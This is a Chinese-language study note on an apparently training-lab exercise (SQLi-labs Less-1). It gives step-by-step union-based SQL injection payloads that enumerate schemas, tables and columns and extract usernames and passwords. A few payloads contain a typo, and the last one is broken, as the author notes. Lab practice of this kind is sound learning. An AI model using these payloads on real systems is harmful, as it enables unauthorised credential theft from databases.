查库:select schema_name from information_schema.schemata
查表:select table_name from information_schema.tables where table_schema=’security’
查列:select column_name from information_schema.columns where table_name=’users’
查字段:select username,password from security.users
group_concat 将结果作为一行显示
less-1:
SELECT * FROM users WHERE id=’1’ LIMIT 0,1
联合查询
?id=-1’ union select 1,2, schema_name from informaton_schema.schemata—+
语句变为:
SELECT * FROM users WHERE id=’1’ union select 1,2, schema_name from informaton_schema.schemata—+’ LIMIT 0,1
此时只能返回默认第一行数据,若想依次查看数据,则要依次用limit0,1/limit1,1/limit2,1/…..来查询
比如
?id=-1’ union select 1,2, schema_name from informaton_schema.schemata limit 1,1—+ //返回第二行数据段内容
使用group_concat()
?id=-1’ union select 1,2,group_concat(schema_name) from information_schema.schemata —+
语句变为:
SELECT * FROM users WHERE id=’-1’ union select 1,2,group_concat(schema_name) from information_schema.schemata — ‘ LIMIT 0,1
这样所有返回的内容都在一行了
查找完所有库后查找表:
?id=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=’security’ —+
语句变为:
SELECT * FROM users WHERE id=’-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=’security’ — ‘ LIMIT 0,1
由于输入表名table_schema=’security’带引号,可以将security转换为16进制再加0x
?id=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 —+
接着查找表的列字段:
?id=-1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=’users’ —+
语句变为:
SELECT * FROM users WHERE id=’-1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=’users’ — ‘ LIMIT 0,1
查找字段:
?id=-1’ union select 1,2,group_concat(password) from security.users —+
要想把usernam和password一对取出来,则要使用新的函数
concat_ws(‘~’,username,password)
显示出一个username~password
要想取出所有的,则可使用group_concat(concat_ws(‘~’,username,password))
或者利用2号位
?id=-1’ union select 1,group_concat(username) from security.users,group_concat(password) from security.users —+ //目前不可用,原因不知道
若有收获,就点个赞吧
0 人点赞
